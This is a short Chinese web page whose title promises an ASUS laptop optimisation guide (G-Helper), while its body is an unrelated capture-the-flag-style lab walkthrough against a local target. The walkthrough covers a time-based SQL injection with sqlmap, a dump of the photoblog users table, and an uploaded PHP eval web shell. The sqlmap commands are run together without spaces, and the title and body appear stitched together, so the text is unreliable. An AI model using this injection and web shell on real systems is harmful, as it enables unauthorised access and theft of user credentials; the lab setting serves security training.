华硕笔记本终极优化指南:用G-Helper替代臃肿的奥创控制中心
2026/6/26 8:01:49
通过靶机的mac地址和探测结果,得出靶机IP地址
浏览器访问地址
sqlmap-u"http://192.168.8.155/cat.php?id=1"--batchid=2AND(SELECT5851FROM(SELECT(SLEEP(5)))nqWc)sqlmap -u "http://192.168.8.155/cat.php?id=1" -D photoblog -T users --dump页面存在文件上传,推测存在漏洞
创建一个文件试试看,写入
<?php eval($_POST['cmd']);?>